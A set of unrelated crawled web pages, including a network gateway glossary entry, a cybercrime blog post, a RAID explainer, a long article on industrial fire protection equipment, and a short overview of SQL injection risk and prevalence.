interoperability. - Security: Gateways can provide robust security measures, such as encryption, firewalls, and intrusion detection, safeguarding the network from external threats. - Scalability: As networks grow, gateways can help manage the increased data traffic and ensure seamless connectivity between new and existing network segments. - Performance Optimization: Gateways can manage bandwidth and prioritize traffic, ensuring that critical applications receive the necessary resources for optimal performance. - Simplified Network Management: Centralizing network traffic through a gateway simplifies network management and monitoring, allowing for more efficient administration and troubleshooting. Uses of Network Gateways Network gateways are used in various scenarios to facilitate communication and data transfer: - Connecting Different Networks: Gateways enable communication between networks with different architectures, such as a corporate network and the internet. - Enabling Remote Access: By acting as a point of entry, gateways allow remote users to securely access internal network resources via VPNs. - Facilitating Cloud Integration: Cloud gateways enable businesses to connect their local infrastructure to cloud services, leveraging the benefits of cloud computing. - Supporting VoIP Communications: VoIP gateways allow traditional phone systems to interact with modern IP-based networks, supporting voice and video calls over the internet. - Integrating IoT Devices: IoT gateways connect various IoT devices to networks, ensuring they can communicate and share data effectively. Features of Network Gateways Network gateways come with a range of features designed to enhance network performance and security: - Advanced Routing: Gateways can use sophisticated algorithms to determine the most efficient path for data packets, optimizing network performance. - Comprehensive Security: Features such as firewalls, encryption, and intrusion detection systems protect the network from unauthorized access and cyber threats. - Quality of Service (QoS): Gateways can prioritize certain types of traffic, ensuring that critical applications receive the necessary bandwidth and resources. - Scalability: Many gateways are designed to scale with the network, supporting additional devices and traffic as the network grows. - Management and Monitoring: Gateways often include tools for network management and monitoring, providing administrators with insights into network performance and potential issues. Implementing a Network Gateway When implementing a network gateway, several factors need to be considered: - Network Requirements: Assess the specific needs of your network, including the types of networks being connected and the expected data traffic. - Security Considerations: Ensure that the gateway includes necessary security features to protect the network from threats. - Performance Needs: Choose a gateway that can handle the expected data traffic and provide the required performance levels. - Scalability: Select a gateway that can scale with your network, supporting future growth and additional devices. - Compatibility: Ensure that the gateway is compatible with existing network hardware and software to avoid integration issues. Frequently Asked Questions Related to Network Gateway What is a network gateway? A network gateway is a device or software that serves as a bridge between two networks, allowing data to flow between them. It manages data traffic and ensures proper routing to its destination, enabling communication between different network protocols or architectures. What are the key functions of a network gateway? Key functions of a network gateway include protocol translation, data routing, security, network address translation (NAT), and bandwidth management. These functions ensure efficient, secure, and reliable data transfer between networks. What types of network gateways are there? Types of network gateways include Internet gateways, enterprise gateways, cloud gateways, VoIP gateways, and IoT gateways. Each type serves specific purposes, such as connecting local networks to the internet, integrating cloud services, or facilitating VoIP communications. What are the benefits of using a network gateway? Benefits of using a network gateway include interoperability between different network systems, enhanced security, scalability, performance optimization, and simplified network management. Gateways ensure seamless data transfer and protection from cyber threats. How do you implement a network gateway? Implementing a network gateway involves assessing network requirements, ensuring necessary security features, choosing a gateway that handles expected data traffic, ensuring scalability, and checking compatibility with existing network hardware and software.
<urn:uuid:493a8791-bb40-4851-a988-6e179d450946>
CC-MAIN-2024-38
https://www.ituonline.com/tech-definitions/what-is-a-network-gateway/
2024-09-12T22:08:30Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00476.warc.gz
en
0.900639
1,459
3.9375
4
Yesterday the United States celebrated Independence Day, which marks the day that the 13 original colonies declared their independence from Great Britain. Many of the complaints were that the colonists were not treated fairly and their rights as English subjects were being undermined. Back in 1776 mass communication was a slow process. News took awhile to get from town to town. Private correspondence took days or weeks to move across a state or country. If someone stole valuable information, it was a slow process to get it to those that could benefit. Today, mass communication is instantaneous. The Internet makes sharing pictures, videos, audio and text a breeze. The amount of information available to all of us has grown to staggering proportions in the last few years. Stealing it is a lot easier today and moving it around to interested parties is very simple. Today our digital rights are being undermined by criminal activity on the Internet. We need to declare our independence from this tyranny and regain a sense of security in our lives. Information security is not just for governments and big corporations. It’s for all of us. Watch this great video about how information security has grown up with the Internet and take a few lessons from the tips at the end of it. Photo credit J.W.Photography
<urn:uuid:dde59fb0-0d42-4efe-8df4-7fbd5bcf83a8>
CC-MAIN-2024-38
https://en.fasoo.com/blog/independence-from-cybercrime/
2024-09-09T09:12:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00876.warc.gz
en
0.977618
255
2.921875
3
Technology, how we love it until something goes wrong and we end up yelling at our computer screens. If you've ever lost data, you know how much time, money, and headaches it can cost you to retrieve it, especially if you are a company. Data recovery doesn't have to be worrisome. The acronym RAID, first used in 1988, stands for Redundant Array of Inexpensive (or Independent) Disks. RAID is an assembly of disk drives, also known as "disk array", which operates as one storage unit. In general, the drives could be any storage system with random data access such as magnetic hard drives, optical storage, magnetic tapes, etc. RAID has several functions which include providing a way of accessing multiple disks grouped together to appear as a single device, spreading data access out over these disks which reduces the risk of losing data if one drive should fail, and improving access time. Can RAID fail? RAID undoubtedly offers more data protection than non-RAID disk systems. However, the management of the disks and the data distribution across them can be complex. Complex redundant systems can suffer failure, most often not a fault of the technology used or the design of the array, but most likely because of its failure to correctly apply these systems which leads to a single point of failure causing disastrous data loss. No matter how well designed or implemented the RAID system is, there is still a factor that can cause RAID data array problems, the human factor. The more complex the system, the higher the likelihood for mistakes to occur. Note the following: - Multiple drives can fail in an array. - Arrays are normally boxed in a single case, so physical damage can affect multiple drives and the control electronics. - Many people don't back up RAID systems because they're 'fault tolerant' - however they're not 'fault proof'. Think of a RAID system as an insurance policy for your data protecting you against drive failure. Drive failure entails employee downtime, lost sales, customer costs, lost opportunities, data restoration and re-entry costs, and intangible costs due in part to work day disruptions not to mention the cost of RAID data recovery. There are several ways to store data using the different RAID levels: - RAID 0, also known as data striping, distributes data across drives which results in higher data throughout. However, since it has no data redundancy, it does not protect against data loss. - RAID 1, also known as drive mirroring, works by simultaneously copying data to a second drive so no data is lost if there is drive failure. - RAID 2 uses Hamming error correction codes and is proposed for use with drives which don't have built-in error detection. - RAID 3 stripes data at a byte level across several drives storing parity (a form of data protection used to recreate the data of a failed drive in a disk array) on a single drive. - RAID 4 stripes data at a block level across several drives, with parity being stored on one drive. The parity information allows for recovery from the failure of any single drive. - RAID 5 is similar to RAID 4 except for the fact that it distributes parity among the drives. For more information see the article on "What is a RAID?". About this post Viewed: 1,728 times No comments have been added for this post. Sorry. Comments are frozen for this article. If you have a question or comment that relates to this article, please post it in the appropriate forum.
<urn:uuid:d1a58861-8939-41b8-9d4e-f41f70351902>
CC-MAIN-2024-38
https://www.fortypoundhead.com/showcontent.asp?artid=21066
2024-09-14T06:31:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651559.58/warc/CC-MAIN-20240914061427-20240914091427-00476.warc.gz
en
0.947402
722
3.203125
3
The best way to fight fire is to prevent it. Each industry and occupancy must provide itself with proper type and adequate number of fire fighting equipment to combat, control and extinguish fire and explosion efficiently, in their industries and occupancies. – Mr. R. R. NAIR Fire – kills and seriously injures people, destroys plant, equipment and property and last but not the least our environment. Rapid industrialization and technological advancement have introduced new materials with characteristics of flammable, toxic or both. Specialised occupancies such as high rise buildings, large warehouses, huge storages of petroleum and other flammable liquids in storage tanks, spheres and bullets have all brought in serious fire and explosion hazards. The fire protection industry is continuously engaged in manufacturing various types of Fire Protection Equipment, with research, development and innovation. Hence, there exists large number of different types of fire fighting equipment, appropriately made to suit specific requirements. In this article a sincere effort is made to summarize, the salient features of important equipment used in fire protection. The types of equipment are dealt with Portable, Fixed and Mobile. 2. PORTABLE FIRE PROTECTION EQUIPMENT 2.1 Portable Fire Extinguisher : Portable extinguishers are designed to cope with fire of limited size and are absolutely necessary even though the plant is equipped with automatic sprinklers, fire water system along with fixed monitors/hose reels and fire engines. Though portable extinguishers are regarded as first aid fire-fighting appliances, they are very valuable if used promptly and efficiently in the early stages of fire. In addition to their portability, the most important features of these hand appliances are the immediate availability for use by one person or at the most by a small crew. Since their capacity is limited, their operational value depends upon the initial charge being sufficient to overcome and confine the fire, eliminating a major fire. Many flammable materials fire, potentially of serious nature, have been put out by diligent use of several hand-operated extinguishers with secondary protection provided by large capacity wheeled extinguishers. If extinguishers are to be relied upon, then they must be of: (a) right type, in sufficient quantity, and easily accessible, (b) properly maintained, and (c) operable by area personnel. When selecting the extinguishers, the materials in the processes involved and the nature of hazard anticipated should be taken into consideration. For this purpose proper understanding of the classification of fires and suitability of portable appliances is necessary which are given in IS 2190 – Code of Practice for Selection, Installation and Maintenance of First-Aid Fire Extinguishers. The Bureau of Indian Standards, has also published a number of standards on fire extinguishers and some of them are IS 940, IS2171, IS2878, IS4862, IS6234, IS5490, IS5896, IS6234, IS6382, IS7673, and IS10658. Number of fire extinguishers provided will depend upon the fire hazard of the materials. Further relevant rules / standards from appropriate authority have to be ensured, such as State Factories Rules, National Building Code, Local Fire Brigade Norms, and Insurance Association Rules, etc. The general principle is that extinguishers are readily available and in sufficient quantity, so that even one fails, another is available within short distance. Rule 71-B (7) of the Maharashtra Factories Rules, 1963 gives the requirement of extinguishers. For example, in factories having more than 100 square meters floor area and where fire may occur due to combustible materials other than flammable liquids, electrical equipment and ignitable metals, soda acid or equivalent type of portable extinguishers at the rate of one every 500 square meters of area, spaced not more than 30 meters apart subject to a minimum of one extinguisher. This means a person can pick up an extinguisher by moving 15 meters only. Extinguisher should be mounted in easily accessible places near entrances, walkway platforms on process units. These can be conveniently mounted on handrails, structure members, etc. On open process units, it is worthwhile to protect the extinguishers from weather by metal cover. Similarly wheeled units should be protected with a metal box. Ensure that not to keep extinguishers near sources of heat. It is recommended that extinguishers installed in any one building or single occupancy shall be similar in shape and appearance and shall have the same method of operations as far as possible. Further wherever possible one suitable type should be provided if there is more than one risk e.g. if there is a hazard due to flammable liquid and also electricity, we can provide dry chemical extinguishers, instead of one Foam type and one CO2. This will eliminate inadvertent use of wrong type of extinguisher. It is important that extinguishers are properly maintained and kept in good operating condition at all times. For this sufficient refills should be kept in hand and also spare extinguishers. Complete guidance is given in Indian Standard on maintenance, inspection and testing, which should be referred to. Atleast once a week routine maintenance should be carried out – observe external appearance; check nozzle, cap, and plunger. Ensure the seal of the extinguisher is intact. If the seal is broken, then thorough inspection is warranted. Once in three months inspection of the extinguisher should be done – open, inspect charges, plunger, nozzle cap, etc. Annually thorough inspection – testing and recharging should be done. Once we have selected the right type of extinguishers, installed them throughout the plant and maintained them properly, all personnel who work in a specified area should be able to operate the extinguishers quickly without any hesitation; that means, a systematic training should be arranged for all personnel. Training should be both in theory and demonstration. Each person should be asked to actually use the extinguishers, preferably in a demonstration fire in the training ground. Correct and safe method of use can be effectively taught and the user will gain confidence and then will not hesitate to use in actual fire. This training can be conducted in groups of about 10. Time, money and effort put on portable extinguisher system is worth it, since we may be able to put out all small fires, which results in the elimination of many potential large fires. We shall examine in detail some of the important type of extinguishers. 2.1.1. Gas Cartridge and Water Extinguishers : The gas cartridge and water extinguishers uses a mixture of plain water or special anti-freeze solution, which is expelled by pressure from a small cartridge of carbon dioxide gas, released when the cartridge top is punctured. The only extinguishing action is the cooling action of water. The cartridge-water extinguisher has a range of approximately 9 to 12 meters. Capacity of the common size is 9 litres. The extinguisher may be used on class A – fires – ordinary combustibles. (wood, textiles, rubbish). However, do not use these extinguishers on fires of energized electrical equipment. This type of extinguisher is hung on a wall or post with the top not more than 1.5 meters above floor. The user grasps the bottom handle with one hand and the nozzle and upper ring with the other. Upon reaching the fire, he bumps the projecting plunger to puncture the sealed cartridge of carbon dioxide inside the extinguisher. The stream of water is directed at the base of the flame. Once a year the gas cartridge should be removed from the extinguisher and weighed to check for loss of weight. The cartridge should be replaced if there is loss of weight greater than 14.2 grams. The level of water should be checked at the filling mark. The extinguisher should be refilled with water and the cartridge renewed immediately after use. At the time of the annual inspection, the interior of the cylinder should be examined and the hose blown through to make sure it is clear and free of leaks. 2.1.2. Carbon Dioxide Extinguishers : The carbon dioxide (CO2) extinguisher contains liquid carbon dioxide under approximately 60 kg/cm2 (850 psi.) which, when released turns into ‘snow’ which smothers fire by exclusion or displacement of air. The snow also exerts a temporary chilling effect, which aids in prevention of immediate re-ignition. Depending on the size of the extinguisher, its range is 1 to 3 Meters. Capacities of common size are 2.2Kg, 3Kgs, 4.5Kgs, and 6.8Kgs. Wheeled units of 9Kgs, and 22.5Kgs, are also available. The CO2 extinguishers may be used on Class B and C fires (oils, gasoline, solvents and gaseous substances under pressure) and on fires of electrical equipments. To extinguish a fire, the extinguisher is removed from its bracket or stand and carried to the fire. The locking pin or sealing wire is removed or broken. To discharge, the horn is aimed at the base of the fire and the gas is released by opening the hand-wheel valve. To prevent re-flash, the snow should be spread over the burned surface even after the flames are extinguished. On flowing flammable material the snow should be worked back toward the source of fire. The weight of carbon dioxide extinguishers should be checked monthly. If the weight loss is greater than 10 percent of the weight listed on the extinguisher, recharging by companies equipped to do it is necessary. Even though only partially discharged, extinguishers should be recharged immediately after use. The record cards should then be filled out and the extinguishers replaced. Every time the extinguisher is sent for recharging, the organization doing the recharging shall be asked to certify that the cylinder has been tested to 210 kg/cm2 (2980 psi) pressure before recharging. The snow released by CO? is dry and non-toxic, and will not harm materials of fine machine parts. It does not conduct electricity and presents no clean-up problem. There is some danger of freezing if it is sprayed on the skin at close range. Recharging is not necessary so long as weight is up to 90 per cent of correct weight. The CO? unit is especially suited for use on mobile equipment, on uneven burning surfaces, or in oil drums, paint spray booths and other confined spaces. However, CO? has many disadvantages and some of them are: - Operators must have air to support life and should not enter rooms in which large quantities of carbon dioxide have been used until the rooms have been ventilated. - Operators must approach close to the fire. The snow has limited penetrating power and is not suitable on deep-seated fires in wood, rubbish and the like. - The snow gives no permanent insulating effect (like foam), but reapplication provides protection against re-ignition. - It is not well suited to open fire outdoors because wind currents may dissipate the gas. The unit requires recharging with special equipment. 2.1.3. Dry Chemical Extinguishers : The dry chemical extinguisher consists of an internally or externally mounted cartridge of carbon dioxide or nitrogen gas which, when the top is punctured or the cartridge valve is opened, expels chemically processed bicarbonate of soda powder in the outer shell through the hose and nozzle. The action of Dry Chemical Extinguisher in putting out the fire is due to the blanketing of powder, which is expelled when carbon dioxide cartridge is punctured; evolution of CO? and the consequent cooling effect when CO? is formed. For portable extinguishers, the range is 2 to 7.5 Meters, depending upon capacity. Capacities of common sizes are 1kg, 2kgs, 5Kgs, and 10Kgs. Larger wheeled units of 25Kgs, 50Kgs, & 75Kgs are also available. The dry chemical unit may be used on Class B and C fires (oils, gasoline, solvents and gaseous substances under pressure) and on fires of electrical equipment. To extinguish a fire, the extinguisher is carried to the scene of fire. After removing the locking pin, the dry chemical chamber is pressured by puncturing the cartridge or opening the cartridge valve. The discharge is controlled by, squeezing the nozzle handle. The flame is swept ahead by the discharged dust and backed up to its source. The pressure cartridge of dry chemical extinguishers should be weighed at least once a year. If the loss of weight of the cartridge is greater than 10 per cent, the cartridge should be replaced or recharged by a company equipped to do so. The condition of the powder should also be checked. The powder should be dry and not caked. To recharge the extinguisher, the empty gas cartridge is replaced with a full one, and the outer shell is refilled with the nominal weight of dry chemical. The operator should blow through the hose, to be certain, it is clear. After use, the cartridge is replaced and the cylinder refilled with the powder. All plugs and caps should be screwed tightly to prevent leakage. Record cards should be filled out, and the extinguisher replaced and protected from damage and corrosion. One fifth of the total number of extinguishers of this type on charge shall be selected for this test every year. The test shall be carried out by, actually operating the extinguisher and watching for satisfactory performances. Pressure test shall be carried out once in three years and are to be tested at pressure of 25Kgf/cm2 (355 psi). The dry chemical powder is a non-conductor of electricity and, being non-toxic and non-corrosive does not harm electrical or mechanical equipment or the operator. However, the fine powder deposit may present a difficult cleaning problem. Recharging can be done quickly without special equipment. Some extinguishers of this type have a limited range and the operator must approach close to the fire. The dust gives no permanent blanketing or insulating effect, and re-ignition is possible. The extinguisher is best suited for installation in outdoor process units. 3. FIXED FIRE PROTECTION EQUIPMENT 3.1 Fire Pumps : They are required for pressuring hydrant system with firewater. Horizontal centrifugal pump is used for above ground storage water in tanks and vertical centrifugal pump in underground storage tanks. Centrifugal fire pump has become the standard today. Its compactness, reliability, easy maintenance, hydraulic characteristics and variety of available drives – electric, steam turbines and internal combustion engines – have made centrifugal fire pump, most ideal for this service. Discharge pressure is set by the minimum residual pressure requirement at the extremity of the system plus the system piping friction loss. Normally the residual pressure at the most remote hydrant should be at least 5.6 Kg / cm².This would indicate a pump discharge pressure of about 8.8 Kg / cm² in an adequately sized piping system. The selection of drive for the pump is important. From the standpoint of low maintenance, ease of start-up and operation, electric drive is preferable. However, at the time of power failure, electric drive pump would not be able to operate. Hence, diesel or gasoline pumps are preferred. It is a standard practice to provide diesel driver pump as a stand by fire pump. In case all the pumps are electrically driven, then it is strongly recommended to provide emergency power supply from captive power generation facilities such as D. G. Sets, etc. Jockey pumps are used to maintain pressure on the fire water systems when not in use. The capacity of this pump should be sufficient to maintain pressure against leakage. Usually, electric motor is provided with automatic start – up. The pump could be started manually from control room or from fire station and also from the local switch at the pump. There is arrangement also for automatic start of the pump, in case system pressure falls below set pressure. Generally manual shutting of the pump is provided. Fire pump should be procured from reputed manufacturers. This is the most important equipment and hence needs proper selection, inspection, maintenance, and testing regularly. 3.2 Water Spray System : Water spray system can be of two type viz. (i) Medium Velocity and (ii) High Velocity. Medium Velocity Water Spray System (1.4 bars to 3.5 bars) is very essential and provides protection for cooling in equipment such as storage tanks, spheres, bullets etc. High Velocity Water Spray System (3.5 bars to 5 bars) is generally used for the protection of transformers. 3.3 Water Monitors : Water is still the best medium for cooling large fires of combustible / flammable materials, particularly in process operating units, storage tanks, oil jetties, loading / unloading gantries, etc. Consider the provision of monitors covering an entire operating unit, fixed on the hydrants. By just starting the fire pump, one person can go around and open number of monitors, raining high flow of water, very fast, in just four to five minutes after noticing a large fire. Hence it makes real sense to provide monitors liberally, wherever, situation warrants their use. Water Monitors, with hand lever operation are available in three different types, designed for Fixed type, (stand post), Portable type, and Trolley Mounted Type. The well-designed constructions allow high flows and throw ranges, complete horizontal and good vertical traverses. Further, the monitor can be locked indefinitely in desired horizontal and vertical positions, by operating two screw mechanisms. Provision of appropriate materials of construction and operating mechanisms can ensure trouble free operation. Though these monitors are developed for high flow, long range water throw attached with straight nozzles, they can be converted to water fog or foam application, by changing the nozzles quickly, which will be supplied by the manufacturer on request. 3.3.1. Oscillating Water Monitors : Large fires requiring wide coverage or specific targets, which have to be cooled for a long time, need tremendous effort, associated with high risk for fire fighting personnel as well. Further, limitations are provisions of large numbers of men and equipment, for a long time. To meet this problem, Water Driven Oscillating Monitors have been developed. It is designed to provide an oscillating water or foam stream over a preset area of protection. It provides rapid blanketing for combating fires in aircraft hangers, on helicopter decks and in tank farms and other high risk areas. The advantages are excellent – water powered and hence can be safely used in hazardous area; wide oscillating arc and good elevation controls; long range horizontal throw; continuous unattended operation and automatic starting at fixed horizontal sweep and vertical elevation. 3.4. Water – Foam Monitors : Foam is a permanent extinguishing agent and the best medium for containing, controlling and extinguishing large fires of flammable or combustible liquid tank or spill fires. Foam is versatile, in as much as that it can not only put out large fires, but of very great help to prevent vapour transmission for some time and also prevent fires in non burning liquid surface in tanks or spills, by forming a foam blanket. No doubt it is of critical importance to start the foam attack immediately at the outbreak of fire, preferably in the very first few minutes. It is invariably possible to put out the fires efficiently, in the incipient stages of fires. Delayed action will help the fire to become big and serious, requiring large scale resources of man power and equipment, to control the fire. Hence it makes good fire protection management sense, to provide Water – Foam Monitors with foam storage, in required locations such as operating units, loading / unloading facilities, storage tanks, effluent treatment plants, oil jetties, airport, etc. There are different types and capacities of Water – Foam Monitors, suitable for all kinds of fire fighting operations and some of them are: - Water Foam Monitor – Stand Post Type (Fixed Type) - Water Foam Monitor – Trolley Mounted Type - Water Foam Monitor – Trailer Mounted Type (Without Foam Tank) - Water Foam Monitor – Trailer Mounted Type (With Foam Tank) 3.5 Trailer Pump : Trailer pump is useful for boosting up pressure in a particular location. Lower pressure from the hydrant can be increased for application in higher elevations such as towers, structures, etc. Diesel engine trailer pumps of 1800 Lit/min. capacity are also available. 3.6. Hose Reels : Hose Reels are usually provided in addition to hydrants in buildings and operating units. Hose, heavy duty rubber, of 2.5cm (1inch) or 3.75cm (1½inch) of about 15 meter length are kept wound on a drum of Hose Reel, connected with a nozzle. The advantage is for fast pulling and raining water on scene of fire quickly. 3.7. Foam Protection for Storage Tanks : Fire on storage tanks are by and large limited, but when it occurs in a storage tank of flammable or combustible liquids, it becomes very serious hazard and can envelop the entire facility, particularly, when the roof sinks, it is a disaster. Fixed Foam Protection facilities are provided for cone roof as well as floating roof tanks. It is probable that foam chambers could also be blown off. Hence, large capacity long-range monitors and Fire Engine with aerial platform with foam pouring facility have been successfully used in large sunken roof tanks. Large quantity of proper type and quality of foam compound is a basic necessity for such conflagrations. 3.8. Automatic Sprinkler Installation : Automatic sprinkler protection is a facility designed to discharge water automatically in sufficient density (litres/minute/m2) to control or extinguish a fire in its early stages. It consists of water discharge devices (sprinklers or sprinkler heads), one or more reliable sources of water at the desired pressure, valves to control water flow, piping to distribute and convey water to the sprinklers and auxiliary equipment such as alarms and supervisory devices. The temperature rise during a fire activates the sprinkler heads, which discharge a spray of water over the protected area. Sprinkler systems apart from controlling and extinguishing fires also give out an alarm and alerts people to take suitable action to tackle the fire. Automatic sprinkler protection has been widely used in a variety of locations. Examples of indoor usage are in factories, warehouses, office building, ships hold, etc. Every sprinkler installation is tailor – made to suit various factors such as features of building construction, dimensions of the compartment, fire load of the occupancy, the possible type of fire, etc. Designing a sprinkler installation, therefore, calls for a through understanding of these factors. An installation which has not been properly designed cannot be expected to function in the desired manner. Extensive guidelines for installation, care and maintenance for automatic sprinkler systems are given in the codes of the National Fire Protection Association (NFPA) of U.S.A. 3.9. Detection Systems : There are various devices used for detection of fires. Some of the common devices used for detection of fires are given below: - Smoke detectors using ionization / photo-electric devices - Heat detectors using fixed temperature / rate of temperature rise devices. - Flame detectors using infrared / ultra violet, spark devices. - LHS cables using digital / analogue devices. - Gas detectors - Manual call points Along with detection systems, which will give alarm in local panel as well as control room panel, can also be utilised in conjunction with Automatic Sprinklers, Dry Chemical Powder System, Carbon Dioxide System, etc. These systems will have to be carefully designed with expertise for proper operation and effectiveness, keeping in clear view the occupancies involved. 4. MOBILE FIRE PROTECTION EQUIPMENT 4.1 Foam Tender : Foam tender is provided in refineries, oil storages, chemical plants, etc. Foam tender will be taken to the location of tanks and foam pumped through foam lines from roadside. Foam tender consist of various components and a typical tender can consist of: (i) Foam tender is fabricated on diesel chassis. (ii) Fire pump has a capacity of 3200 LPM at 8 Kg / cm2. (iii) Water tank has a capacity of 3000 Litres. (iv) Foam tank ha capacity of 3000 Litres. (v) Monitor is fitted on top of the tank. (vi) Control panel with compound gauge, pressure gauge, engine throttle control, pump to foam proportional, foam tank to foam select or valve, auxiliary foam connection, cooling valve, drain valve, pump to monitor, throttle and pump to hose reel. 4.2. Fire Tender : Fire tender is similar to Foam Tender but it does not have foam – producing facilities. While Foam tender is provided in refineries, oil storage, terminals, fertilizer plants, chemical plants, etc. Fire tender is usually provided by Municipal / State Fire Brigades and industries, which do not have large storage of flammable / combustible liquids. 4.3. DCP Cum Foam Tender : DCP Cum Foam Tender is capable of operating of water, water foam and dry chemical powder separately. The components include – Water Pump, Water Tank, Foam Tank, Foam Proportioning Procedure, Foam Monitor, DCP Vessels, Gas Expelling System, Hose Reel and DCP Monitor. 4.4. Emergency Rescue Tender : The Emergency Rescue Tender (ERT) including all accessories should be designed and manufactured as per relevant Indian Standards wherever applicable and should be as per sound engineering practice. Following are components that are usually provided, but others can be included as per customer’s requirement. Diesel Generator, Battery Operated Amplifier System, Extension Ladder, Pneumatic Lifting Equipment, Leak Sealing Pads, Leak control Kits, Low Temperature Protective Suit, Fire Entry Suit, Fire Proximity Suit, Hydraulic spreader and cutter, Portable Gas Detectors, Self Contained Breathing Apparatus (SCBA), LPG Transfer Equipment, Traffic Control Equipment, etc. Portable fire extinguishers have an important role to play in the fire protection programme of any industry. However, they have their limitations. They are not designed to fight a large or spreading fire. Even against small fires, they are useful only under certain conditions. Water has greater cooling properties than any of the other extinguishing agents and can be used to reach a deep seated fire. So water should be used on burning solids. However, it is infective in many fire scenarios, especially on oil fires. CO2 is most suitable for dealing with small contained fires and small fires involving escaping liquids on horizontal and vertical surfaces. Foam is the only proven method of controlling and extinguishing fires in storage tanks, tank farms, effluent water treatment facility, etc. Dry powder is the most suitable type of extinguisher for dealing with fires in flammable liquids. It is also a non conductor of electricity and can be safely used on fires where there is a risk of electrical shock. In spite of all technical advances, water is the cheapest, most efficient and environmentally friendly fire extinguishing medium. No amount of appliances or equipment would be of much use, if sufficient quantities of water, under required pressure were not available for fire fighting. An automatic sprinkler installation will, in a large majority of circumstances control and extinguish a fire with less than 1000 litres of water and may, therefore be the most economic way of limiting the loss in a fire, particularly in areas of limited water supplies. The best way to fight fire is to prevent it. Each industry and occupancy must provide itself with proper type and adequate number of fire fighting equipment to combat, control and extinguish fire and explosion efficiently, in their industries and occupancies. While procuring fire equipment, ensure proper quality, approved by recognised authority such as Bureau of Indian Standards (BIS). The successful use of any type of fire equipment depends upon three elements being in place at the same time i.e. Equipment, Maintenance and Training. It should be kept in mind that the correct equipment and proper maintenance without effective training on how to use the equipment is inadequate. Similarly the effective equipment in the hands of trained personnel will not be effective if the equipment has not been maintained and fails or performs poorly in a fire. Trained personal using well maintained equipment will not be successful if the equipment was not the proper type for the hazard. - Bureau of Indian Standards – IS933, IS934, IS940, IS942, IS2171, IS2190, IS2871, IS2878, IS4308, IS4562, IS4861, IS4862, IS5896, IS6234, IS6382, IS8442, IS10204, IS10658, IS11070, IS11108, IS15105, - The Factories Act, 1948 with the Maharashtra Factories Rules, 1963. Mumbai, Labour Law Agency, 2010. - Maharashtra Fire Prevention and Life Safety Measures Rules, 2008. - Nair R. R. – Fire and Explosion Hazards – Management of Industrial Hazards (CEP Publication) by – S.B. Hegde Patil and R.R. Nair. All India Council for Technical Education, Bangalore, 1997. - Nair R. R. – Fire Prevention and Protection. Industrial Safety Review, June 2012. - Nair. R.R and Veeraraghavan, R. – Fire Technology: Fire Prevention and Fire Protection, (CEP Publication) All India Council for Technical Education, Bangalore, 2002. - National Building Code of India 2005 –Bureau of Indian Standards, New Delhi,2007. - NFPA 10- Standard for Portable Fire Extinguishers – 2007 Edition, National Fire Protection Association, USA. - NFPA Fire Protection Handbook, 19th Edition – National Fire Protection Association, USA. - Safety and Fire Protection Handbook – Edited by R. Veeraraghavan, Mumbai, Safe Technology, 2009. - Training Programme on Basic Fire Fighting – Loss Prevention Association of India Ltd., Bombay, 1991. - Voelkert, J. C – Fire and Fire Extinguishments, 2009. Mr.R. R. Nair has more than 40 year’s exposure in Occupational Safety, Health & Fire Protection. He is author of 15 books & more than 60 articles in various topics on Safety, Health & Environment. He has carried out more than 45 safety audits in various industries and high rise buildings. For more information contact: M.: 09224212544 / 09167246783, Res.: 022 2766 5975 E-mail: [email protected]
<urn:uuid:14b44af6-22df-437c-a14f-2858de8f1b4e>
CC-MAIN-2024-38
https://www.isrmag.com/equipment-for-fire-protection/
2024-09-20T10:48:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652246.93/warc/CC-MAIN-20240920090502-20240920120502-00876.warc.gz
en
0.9256
6,398
2.5625
3
SQL injection (SQLi) is a frequent topic on this blog – it refers to an injection attack that allows an attacker to execute malicious SQL statements that allow the attacker to control a web application’s database server. Since an SQL injection vulnerability could possibly affect any website or web application that makes use of an SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities. An attacker taking advantage of an SQLi vulnerability is essentially exploiting a weakness introduced into the application through poor web application development practices. This allows attackers to send SQL commands to the web application, allowing them to gain unauthorized access to data held in the backend database. By leveraging an SQL injection vulnerability, given the right circumstances, an attacker can use it to bypass a web application’s authentication and authorization mechanisms and retrieve the contents of an entire database. SQL injection can also be used to add, modify and delete records in a database, affecting data integrity. To such an extent, SQL injection can provide an attacker with unauthorized access to sensitive data including, customer data, personally identifiable information (PII), trade secrets, intellectual property and other sensitive information. While SQLi is mostly used to steal data from the database, the vulnerability can be escalated further, especially if the permissions on the database are not correctly configured. For example, the attacker can inject a query that causes some tables to be deleted from the database, effectively causing a DoS attack. An attacker can also potentially deploy a web shell onto the server and subsequently take over the server, and even pivot into other systems as a result of SQLi. So, we established SQLi is a major threat to any web application not properly handling user input to SQL statements to the database, but how common is the vulnerability? In our latest Web Application Vulnerability Report we registered a 3% drop in SQL injection from the previous year. The fact that SQL injection is slowly receding is good news for defenders — it means that all the effort poured in by educators in the field is starting to bear fruit. This being said, at 23% of sampled targets being vulnerable to SQLi, we are certainly nowhere near casting it away into the history books. This post contained excerpts from the 2016 Acunetix Web Application Vulnerability Report. For more stats and coverage on web application vulnerabilities in 2016, download the report for free. Get the latest content on web security in your inbox each week.
<urn:uuid:291d7e78-526f-4279-931e-f5f9a6873034>
CC-MAIN-2024-38
https://www.acunetix.com/blog/articles/sql-injection-receding-but-still-concern/
2024-09-09T15:53:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00076.warc.gz
en
0.913431
502
2.875
3
